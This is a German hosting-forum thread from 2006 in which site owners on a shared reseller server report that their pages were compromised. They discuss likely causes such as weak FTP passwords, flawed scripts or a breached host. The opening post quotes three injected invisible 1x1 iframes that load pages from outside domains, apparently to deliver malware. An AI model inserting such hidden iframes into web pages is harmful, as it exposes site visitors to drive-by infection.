Du bist nicht angemeldet.

[ Virusalarm ] Hackerangriff auf Server!!!

Matthias

Anfänger

  • »Matthias« ist der Autor dieses Themas

Beiträge: 2

  • Private Nachricht senden

1

Freitag, 10. November 2006, 23:11

Hackerangriff auf Server!!!

Moin moin!

Ich habe einen Reseller-Server bei Xantron. Alles wunderbar bis vor ca. 1 Woche sämtliche Homepages im Quelltext verändert wurden und diese wahrscheinlich bösartigen Code beinhalten!!!!!!!

ARGGGHHHHHHHHHHHHHH

Jetzt wirft sich mir die Frage auf, wie haben die das gemacht???

Über meinen Rechner glaube ich nicht, da dieser seit 4 Wochen nicht in betrieb ist und mein anderer Daddel-PC verfügt nicht über die Logindaten...

Logindaten der Homepage über Internet oder ähnliches rausbekommen... hmmm, kann sein... aber es handelt sich um 5 verschiedene Homepages mit unterschiedlichen Logins!

Also ich habe keine Ahnung wie die es gemacht haben und wie man sich dagegen schützen kann!!!!


Hat einer von Euch schon mal so etwas miterlebt und oder Erfahrung in diesem Bereich???

Folgende Code-Schnipsel wurden mehrfach in den Seiten hinzugefügt:

Quellcode

 
1

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

Quellcode

 
1

<iframe src=http://53server.com/counter/index.php width=1 height=1></iframe>

Quellcode

 
1

<iframe src=http://ltds.biz/go.php?id=1781&user_name=sam width=1 height=1></iframe>



Für alle Infos wäre ich sehr dankbar :anbet:

Ingo

Fortgeschrittener

Beiträge: 570

  • Private Nachricht senden

2

Samstag, 11. November 2006, 03:03

Hi,
tja.. Dein Server wurde gehacked. Wenn Deine Sicherheitsvorkehrungen nicht ausreichen, reicht ein Script eines Kunden aus, um den Server angreifbar zu machen.
Gruß
Ingo

Matthias

Anfänger

  • »Matthias« ist der Autor dieses Themas

Beiträge: 2

  • Private Nachricht senden

3

Samstag, 18. November 2006, 10:27

Sicherheitsvorkehrungen...

hmmm, es ist ein virtueller Server beim Provider. Sprich die Sicherheitsvorkehrungen manage ich nicht selber!!!

Script beim Kunde... ok -> aber die schreiben keine Scripte... und dennoch waren alle Seiten geknackt...


Wie kann ich meinen Server schützen???

Wer hat gute Vorschläge!!!

LapisInfernalis

Super Moderator

Beiträge: 2 817

  • Private Nachricht senden

4

Samstag, 18. November 2006, 11:06

So lapidar es klingt: Sichere Passwörter für die FTP-Zugänge.

Außerdem kannst Du Ordner, welche PHP-Dateien enthalten, die an anderer Stelle eingebunden werden (z.B. Zugangsdaten für Datenbanken), per htaccess für einen Zugriff übers Web schutzen (Deny from all).

Greetings

LapisInfernalis
Signatur von »LapisInfernalis« Eine Milde Gabe...

Der Horizont vieler Menschen ist ein Kreis mit dem Radius Null - und das nennen sie ihren Standpunkt.
Albert Einstein (1879-1955)

A common mistake people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools.
Douglas Adams (1952-2001)

Forenheini

Anfänger

Beiträge: 2

  • Private Nachricht senden

5

Sonntag, 19. November 2006, 18:38

nicht nur der user hat das Problem, auch ich habe alle meine seiten gehackt und bekomme bei dem besuch meiner websites pausenlos irgendwelche viren gemeldet.

Dank Antivir konnte ich diese alle löschen, aber ein virtueller server sollte doch sicher sein.

es ist richtig wirlich ärgerlich. Speziell, wenn geschäftskunden hat, die diese website schon nicht mehr besuchen.

mfg

Forenheini
Signatur von »Forenheini« Forenheini

MaMo

Fortgeschrittener

Beiträge: 372

  • Private Nachricht senden

6

Sonntag, 19. November 2006, 19:02

Hi,

ein virtueller Server ist so sicher wie du ihn konfiguriert. Nicht der Provider ist für die Sicherheit zuständig sondern DU! Am besten erkundigst du dich mal wie man einen Server richtig aufsetzt.

MfG MaMo

Forenheini

Anfänger

Beiträge: 2

  • Private Nachricht senden

7

Sonntag, 19. November 2006, 19:05

wieder

so mein lieber, dann erzähl mir mal bitte, wie man einen virtuellen server konfiguriert, wenn man keine rechte hat.

so und nun du
Signatur von »Forenheini« Forenheini

MaMo

Fortgeschrittener

Beiträge: 372

  • Private Nachricht senden

8

Sonntag, 19. November 2006, 20:19

So mein Lieber, ein virtueller Server ist normalerweise ein Server zu dem man Root-Zugriff hat, das hast du aber nicht näher erklärt. Auch von Dir installeirte Scripte können falsch konfiguriert sein und Lücken haben. Zum Thema Sicherheit findest du genügend Literatur im Netz. Wieso fragst du eigentlich wie man sich schützen kann, wenn du garkeine Rechte hast da dran was zu ändern? Was sagt dein Hoster?

So und nun Du...

MaMo

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »MaMo« (19. November 2006, 20:19)

LapisInfernalis

Super Moderator

Beiträge: 2 817

  • Private Nachricht senden

9

Sonntag, 19. November 2006, 23:28

[q=MaMo]So mein Lieber, ein virtueller Server ist normalerweise ein Server zu dem man Root-Zugriff hat[/q]
Tja mein Lieber... ;) Ich fürchte, da hast Du was falsch verstanden. Auf einen virtuellen Server hat man keinen Root-Zugriff. Deswegen heißt er ja virtuell... Dabei handelt es sich um einen SharedHosting-Server, d.h. auf einem echten Server richtet der Hoster eine Reihe von virtuellen Servern ein. Je höher der Tarif, desto weniger Accounts laufen auf einem Server.

Erst wenn Du der einzige Kunde auf dem Server hast, besitzt Du auch Root-Zugriff. In diesem Fall spricht man aber von einem ManagedServer o.ä. Dieser ist dann aber real und nicht mehr virtuell...

Und was das Einrichten, Warten und Kontrollieren des Servers angeht, so hast Du als Endkunde im Shared-Hosting-Bereich damit wirklich nichts zu tun und in der Regel nur sehr eingeschränkte Möglichkeiten... Und wenn der Server selbst gehackt wird, kannst Du nichts dafür, denn dann sind alle Kunden, die einen Account auf diesem Server haben, betroffen.

Du bist nur dann selbst Schuld, wenn Du aufgrund eines Scriptes oder zu einfacher Passwörter selber dem Hacker Tür und Tor öffnest. Aber in diesem Fall sollte nur Dein Account betroffen werden und nicht auch die Accounts der anderen virtuellen Server auf dem Rechner. Wenn dem doch so ist, so hat der Hoster den Server nicht richtig konfiguriert...

Grüße

LapisInfernalis
Signatur von »LapisInfernalis« Eine Milde Gabe...

Der Horizont vieler Menschen ist ein Kreis mit dem Radius Null - und das nennen sie ihren Standpunkt.
Albert Einstein (1879-1955)

A common mistake people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools.
Douglas Adams (1952-2001)

MaMo

Fortgeschrittener

Beiträge: 372

  • Private Nachricht senden

10

Montag, 20. November 2006, 07:00

Zitat von »LapisInfernalis«

[q=MaMo]So mein Lieber, ein virtueller Server ist normalerweise ein Server zu dem man Root-Zugriff hat[/q]
Tja mein Lieber... ;) Ich fürchte, da hast Du was falsch verstanden. Auf einen virtuellen Server hat man keinen Root-Zugriff. Deswegen heißt er ja virtuell... Dabei handelt es sich um einen SharedHosting-Server, d.h. auf einem echten Server richtet der Hoster eine Reihe von virtuellen Servern ein. Je höher der Tarif, desto weniger Accounts laufen auf einem Server.
Tut mir leid mein Lieber(Man sind wir hier alle lieb zueinander) :D
Ein virtueller Server kann durchaus Root-Zugriff haben. Die Firma/Software Virtuozzozum Beispiel entwickelt diese Software, die einen Rootserver so einrichtet, dass verschiedene "Unter"-Root-Server laufen. Da dies allgemein unter virtuellen Servern verstanden wird, bin ich davon ausgegangen (Beispiel: http://hosteurope.de/vpshosting). Das was Ihr ansprecht ist normalerweise als SharedHosting zu bezeichnen.

MaMo

Lord Raydenor

Schüler

Beiträge: 73

  • Private Nachricht senden

11

Montag, 20. November 2006, 12:53

Hilfe!!! Zickenkrieg ... :sick:
Signatur von »Lord Raydenor«

Zitat

"Einen innerlich freien und gewissenhaften Menschen kann man zwar vernichten, aber nicht zum Sklaven oder zum blinden Werkzeug machen." - Albert Einstein

LapisInfernalis

Super Moderator

Beiträge: 2 817

  • Private Nachricht senden

12

Montag, 20. November 2006, 13:25

[q=Lord IchverstehkeinSpaß]Hilfe!!! Zickenkrieg ... :sick:[/q]
Wieso denn Zickenkrieg? Pahh... :D Wir sind doch nur sehr freundlich zueinander... ;) Zuviel Emotion auf einmal? ;)

[q=MaMo]Man sind wir hier alle lieb zueinander[/q]
Eben... :thumbsup:

[q=MaMo]in virtueller Server kann durchaus Root-Zugriff haben. Die Firma/Software Virtuozzo zum Beispiel entwickelt diese Software, die einen Rootserver so einrichtet[/q]
Also eine dieser Begriffsklärungs-wir-reden-aneinander-vorbei-Kisten... :D Alle haben Recht und jeder ist glücklich...

Bleibt die Frage: Mit vollem Root-Zugriff auf einen echten Server hat man natürlich mehr Verantwortung für den Betrieb des Servers, als bei einem virtuellen oder anteiligen Server, wenngleich auch dort Dinge wie Script- und Passwort-Sicherheit eine wichtige Rolle spielen.

Doch was gibt es noch zu beachten? Ich bin gespannt wohin diese Diskussion führt, denn irgendwie geht uns dieses Problem doch alle an, oder?

Zickende Grüße ;)

LapisInfernalis
Signatur von »LapisInfernalis« Eine Milde Gabe...

Der Horizont vieler Menschen ist ein Kreis mit dem Radius Null - und das nennen sie ihren Standpunkt.
Albert Einstein (1879-1955)

A common mistake people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools.
Douglas Adams (1952-2001)

Lord Raydenor

Schüler

Beiträge: 73

  • Private Nachricht senden

13

Montag, 20. November 2006, 22:42

Ooch ... Spaß versteh ich schon, sonst hätte ich das nicht geschrieben, vielleicht sollte ich das nur demnächst in Ironie-Tags setzen .... :D
Signatur von »Lord Raydenor«

Zitat

"Einen innerlich freien und gewissenhaften Menschen kann man zwar vernichten, aber nicht zum Sklaven oder zum blinden Werkzeug machen." - Albert Einstein

Matthias B

Anfänger

Beiträge: 1

  • Private Nachricht senden

14

Dienstag, 21. November 2006, 14:05

RE: Hackerangriff auf Server!!!

Zitat von »Matthias«

Moin moin!

Ich habe einen Reseller-Server bei Xantron. Alles wunderbar bis vor ca. 1 Woche sämtliche Homepages im Quelltext verändert wurden und diese wahrscheinlich bösartigen Code beinhalten!!!!!!!


Servus, habe hier das exakt selbe Problem (nicht nur den Vornamen, auch den Rest ;))

Ich habe ebenfalls einen Reseller-Account bei Xantron, das erste mal habe ich Verändererungen am Quelltext bei meinen Projekten Ende Oktober bemerkt (ca. 20.). Die meisten eingefügten Seiten waren als ich sie bemerkte zwar leer, einmal wurde aber z.B. versucht Java zu starten.

Die Frage ist nun, hat sich jemand drangehockt und ein paar Reseller-Passwörter geknackt (unser Fehler), oder sich gleich auf dem ganzen Server breit gemacht (Xantrons Fehler).

Per google lassen sich einige bei xantron gehostete Seiten finden, bei denen ebenfalls iframes eingebaut wurden.

Auf meine Nachfragen an Xantron diesbezüglich wurde ich jeweils nur mit "wir werden das genau überprüfen" abgespeißt, ob sich inzwischen was getan hat kann ich nicht sagen, die Änderungen kamen recht unregelmäßig. Bei meiner zweiten Anfrage schienen sie jedenfalls von der ersten schon nichts mehr zu wissen und ließen sich das ganze nochmal von vorne erklären...
Hat sich von euch auch jemand schon an Xantron gewand?

Gruß,
Matthias B.

TheNobody Style

alter Sack, aber Chef :D

Beiträge: 4 678

Vorname: Andreas

  • Private Nachricht senden

15

Donnerstag, 23. November 2006, 12:47

RE: Hackerangriff auf Server!!!

Zitat von »Matthias B«


Die Frage ist nun, hat sich jemand drangehockt und ein paar Reseller-Passwörter geknackt (unser Fehler), oder sich gleich auf dem ganzen Server breit gemacht (Xantrons Fehler).

Per google lassen sich einige bei xantron gehostete Seiten finden, bei denen ebenfalls iframes eingebaut wurden.

also dann würd ich mal stark vermuten, dass da nen ganzer Server geknackt wurde ... is auch wahrscheinlich um einiges einfacher, als mehrere Reseller-Passwörter zu knacken :rolleyes:
Signatur von »TheNobody Style«

Lesezeichen: